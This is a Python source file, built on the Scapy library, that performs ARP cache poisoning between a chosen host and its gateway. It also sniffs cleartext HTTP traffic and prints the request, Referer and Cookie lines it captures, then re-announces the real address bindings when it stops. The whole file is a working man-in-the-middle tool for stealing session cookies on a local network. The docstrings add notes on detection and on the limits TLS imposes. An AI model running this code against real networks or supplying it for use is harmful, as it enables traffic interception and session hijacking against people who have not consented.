'''
ARP spoofing (ARP cache poisoning)
'''
from scapy.all import *
import time
from threading import Thread
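def main(target_ip, gateway_ip):
    """Run the ARP-spoofing demo between one host and its gateway.

    Resolves both MAC addresses, starts the poisoning loop in a background
    thread, prints cookie-bearing HTTP lines seen on TCP port 80, and finally
    re-announces the genuine IP-to-MAC bindings.

    Only cleartext HTTP is inspected (the capture filter is "tcp port 80"),
    so traffic carried over TLS is not readable by this capture.

    Args:
        target_ip: IP address of the host whose ARP cache is modified.
        gateway_ip: IP address of the gateway that host normally uses.
    """
    conf.verb = 0  # silence Scapy's per-packet console output

    # Resolve the MAC address behind each IP address.
    target_mac = get_mac(target_ip)
    gateway_mac = get_mac(gateway_ip)
    if target_mac is None or gateway_mac is None:
        # get_mac() returns None when no ARP reply arrived. Continuing would
        # make restore_target() announce a wrong binding instead of the real
        # one, leaving both ARP caches broken.
        print("[!] Could not resolve a MAC address; aborting.")
        return

    # Daemon thread: it ends automatically when the main thread exits.
    # (Thread.setDaemon() is deprecated; the constructor flag replaces it.)
    t = Thread(
        target=poison_target,
        args=(target_ip, target_mac, gateway_ip, gateway_mac),
        daemon=True,
    )
    t.start()

    try:
        # Blocks until the capture is interrupted; packets are not stored.
        sniff(filter="tcp port 80", prn=packet_callback, store=0)
    finally:
        # Always put the real bindings back, even if the capture raised.
        # NOTE(review): the poisoning thread is still running at this point,
        # so its replies can interleave with the corrections until exit.
        restore_target(target_ip, target_mac, gateway_ip, gateway_mac)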
# Function that restores the target's ARP cache
def restore_target(target_ip, target_mac, gateway_ip, gateway_mac):
    """Re-announce the genuine IP-to-MAC bindings of the target and gateway.

    Two ARP replies (op=2) are built, each carrying the real hardware address
    of its sender IP and a broadcast hardware destination, and each is sent
    five times.

    Args:
        target_ip: IP address of the host whose cache was modified.
        target_mac: Real MAC address of that host.
        gateway_ip: IP address of the gateway.
        gateway_mac: Real MAC address of the gateway.
    """
    print("[*] Restoring target...")
    broadcast = "ff:ff:ff:ff:ff:ff"
    corrections = (
        # Tells the target where the gateway really is.
        ARP(op=2, psrc=gateway_ip, hwsrc=gateway_mac, pdst=target_ip, hwdst=broadcast),
        # Tells the gateway where the target really is.
        ARP(op=2, psrc=target_ip, hwsrc=target_mac, pdst=gateway_ip, hwdst=broadcast),
    )
    for reply in corrections:
        send(reply, count=5)
# Cookie-sniffing function
def packet_callback(packet):
    """Print request, referrer and cookie lines from a captured TCP segment.

    Segments without a payload, or whose payload does not contain the bytes
    "Cookie", are ignored. The payload is split on newlines, so printed lines
    may still end in a carriage return. Everything printed here travelled in
    cleartext; cookies sent only over TLS never reach this callback in
    readable form.

    Args:
        packet: Captured packet; it must contain a TCP layer.
    """
    tcp_payload = packet[TCP].payload
    if not tcp_payload:
        return

    raw = bytes(tcp_payload)
    if b"Cookie" not in raw:
        return

    for line in raw.split(b"\n"):
        # "Refere" is a prefix match, so it also matches the Referer header.
        if b"Refere" in line or b"GET /" in line:
            print(line)
        elif b"Cookie" in line:
            print(line, "\n")
# ARP-spoofing function
def poison_target(target_ip, target_mac, gateway_ip, gateway_mac):
    """Send forged ARP replies to the target and the gateway in an endless loop.

    Both replies leave hwsrc unset, so the sender's own hardware address is
    presumably filled in by Scapy. On the wire this appears as unsolicited
    ARP replies, repeated every two seconds, in which one MAC address claims
    two different IP addresses. ARP monitoring and switch-level ARP
    inspection key on that pattern.

    The function never returns; the caller runs it in a daemon thread.

    Args:
        target_ip: IP address of the host being misdirected.
        target_mac: MAC address of that host.
        gateway_ip: IP address of the gateway.
        gateway_mac: MAC address of the gateway.
    """
    # Reply addressed to the target, claiming the gateway's IP address.
    to_target = ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst=target_mac)
    # Reply addressed to the gateway, claiming the target's IP address.
    to_gateway = ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst=gateway_mac)

    print("[*] Beginning the ARP poison...")
    while True:
        for forged in (to_target, to_gateway):
            send(forged)
        time.sleep(2)
# Function that looks up a MAC address
def get_mac(ip):
    """Look up the MAC address that answers ARP for *ip*.

    Broadcasts an ARP request on the local segment and waits up to two
    seconds for answers.

    Args:
        ip: IP address to resolve.

    Returns:
        The hardware source address of the first reply, or None when nothing
        answered within the timeout.
    """
    probe = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip)
    answered, _unanswered = srp(probe, timeout=2)
    for _sent, reply in answered:
        # Only the first answer is used.
        return reply[ARP].hwsrc
    return None
if __name__ == "__main__":
    # Both addresses are read interactively: target first, then gateway.
    # Arguments are evaluated left to right, so the prompt order is kept.
    main(input("Input target ip:"), input("Input gateway ip:"))